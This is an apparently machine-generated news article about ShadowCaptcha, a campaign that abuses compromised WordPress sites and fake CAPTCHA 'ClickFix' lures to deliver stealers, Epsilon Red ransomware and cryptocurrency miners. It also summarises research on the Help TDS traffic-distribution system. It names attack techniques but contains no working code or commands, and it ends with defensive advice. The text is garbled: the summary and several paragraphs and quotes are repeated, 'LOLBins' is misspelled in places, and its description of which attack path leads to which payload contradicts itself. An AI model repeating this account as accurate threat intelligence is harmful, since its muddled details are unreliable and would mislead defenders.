Ethical Hacking News
A new large-scale campaign known as ShadowCaptcha has been identified as exploiting over 100 compromised WordPress sites to spread ransomware, information stealers, and cryptocurrency miners. This malicious operation utilizes a combination of social engineering tactics, living-off-the-land binaries (LOBins), and multi-stage payload delivery to gain and maintain control over targeted systems.
The ShadowCaptcha campaign is exploiting over 100 compromised WordPress sites to spread ransomware, information stealers, and cryptocurrency miners using social engineering tactics, living-off-the-land binaries (LOBins), and multi-stage payload delivery. The attackers aim to collect sensitive information through credential harvesting and browser data exfiltration, deploy cryptocurrency miners to generate illicit profits, and cause ransomware outbreaks. The attacks begin with unsuspecting users visiting a compromised WordPress website that has been injected with malicious JavaScript code responsible for initiating a redirection chain. The use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware was documented last month by CloudSEK. The attacks are characterized by the use of anti-debugger techniques to prevent inspection of web pages using browser developer tools, and relying on DLL side-loading to execute malicious code under the guise of legitimate processes. A majority of infected WordPress sites are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning various sectors such as technology, hospitality, legal/finance, healthcare, and real estate. Help TDS is a traffic distribution system that has been active since 2017 and has been linked to malicious schemes like VexTrio Viper, providing partners and affiliates with PHP code templates to direct users to malicious destinations based on targeting criteria.
The world of cybersecurity is ever-evolving, with new threats emerging on a daily basis. A recent large-scale campaign, dubbed ShadowCaptcha, has been identified as exploiting over 100 compromised WordPress sites to spread ransomware, information stealers, and cryptocurrency miners. This malicious operation, first detected in August 2025, utilizes a combination of social engineering tactics, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain control over targeted systems.
According to researchers from the Israel National Digital Agency, the ShadowCaptcha campaign blends social engineering, LOLBins, and multi-stage payload delivery to achieve its objectives. The ultimate goals of this campaign include collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.
The attacks begin with unsuspecting users visiting a compromised WordPress website that has been injected with malicious JavaScript code responsible for initiating a redirection chain that takes them to a fake Cloudflare or Google CAPTCHA page. From there, the attack chain forks into two different paths depending on the ClickFix instructions displayed on the web page.
One path utilizes the Windows Run dialog, culminating in the deployment of Lumma and Rhadamanthys stealers via MSI installers launched using msiexec.exe or through remotely-hosted HTA files run using mshta.exe. The other path guides the victim to save a page as an HTML Application (HTA) and then run it using mshta.exe.
The execution flow triggered via the Windows Run dialog ends with the deployment of Epsilon Red ransomware, while the execution of the saved HTA payload results in the installation of this ransomware.
It's worth noting that the use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware was documented last month by CloudSEK. The compromised ClickFix page automatically executes obfuscated JavaScript that uses 'navigator.clipboard.writeText' to copy a malicious command to the user's clipboard without any interaction, relying on users to paste and run it unknowingly.
The attacks are characterized by the use of anti-debugger techniques to prevent inspection of web pages using browser developer tools, while also relying on DLL side-loading to execute malicious code under the guise of legitimate processes.
SHARE
A recent large-scale campaign known as ShadowCaptcha has been identified as exploiting over 100 compromised WordPress sites to spread ransomware, information stealers, and cryptocurrency miners. This malicious operation utilizes a combination of social engineering tactics, living-off-the-land binaries (LOBins), and multi-stage payload delivery to gain and maintain control over targeted systems.
According to researchers from the Israel National Digital Agency, the ShadowCaptcha campaign blends social engineering, LOLBins, and multi-stage payload delivery to achieve its objectives. The ultimate goals of this campaign include collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.
The attackers have been observed delivering an XMRig-based cryptocurrency miner with some variants fetching the mining configuration from a Pastebin URL rather than hard-coding it in the malware, thus allowing them to adjust the parameters on the fly. In cases where the miner payloads are deployed, the attackers have also been observed dropping a vulnerable driver ("WinRing0x64.sys") to achieve kernel-level access and interact with CPU registers with an aim to improve mining efficiency.
Of the infected WordPress sites, a majority of them are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning various sectors such as technology, hospitality, legal/finance, healthcare, and real estate. It's essential to train users to watch out for ClickFix campaigns, segment networks to prevent lateral movement, and ensure WordPress sites are kept up-to-date and secured using multi-factor authentication (MFA) protections.
"ShadowCaptcha shows how social-engineering attacks have evolved into full-spectrum cyber operations," the researchers said. "By tricking users into running built-in Windows tools and layering obfuscated scripts and vulnerable drivers, operators gain stealthy persistence and can pivot between data theft, crypto mining, or ransomware."
The disclosure comes as GoDaddy detailed the evolution of Help TDS, a traffic distribution (or direction) system that has been active since 2017 and has been linked to malicious schemes like VexTrio Viper. Help TDS provides partners and affiliates with PHP code templates that are injected into WordPress sites, ultimately directing users to malicious destinations based on the targeting criteria.
"The operation specializes in tech support scams utilizing full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization through dating, cryptocurrency, and sweepstakes scams," security researcher Denis Sinegubko said.
Some of the notable malware campaigns that have leveraged Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages use JavaScript to force browsers to enter full-screen mode and display the fraudulent alert and even feature counterfeit CAPTCHA challenges before rendering them in a bid to sidestep automated security scanners.
Help TDS operators are said to have developed a malicious WordPress plugin known as "woocommerce_inputs" between late 2024 and August 2025 to enable the redirection functionality, alongside steadily adding credential harvesting, geographic filtering, and advanced evasion techniques. The plugin is estimated to be installed on over 10,000 sites worldwide.
"This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering," GoDaddy said. "By providing ready-made solutions including C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals seeking to monetize infiltrated websites."
"The operation specializes in tech support scams utilizing full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization through dating, cryptocurrency, and sweepstakes scams," security researcher Denis Sinegubko said.
Related Information:
https://www.ethicalhackingnews.com/articles/New-ShadowCaptcha-Campaign-Spreads-Ransomware-Info-Stealers-and-Crypto-Miners-Through-Exploited-WordPress-Sites-ehn.shtml
https://thehackernews.com/2025/08/shadowcaptcha-exploits-wordpress-sites.html
Published: Tue Aug 26 07:46:26 2025 by llama3.2 3B Q4_K_M
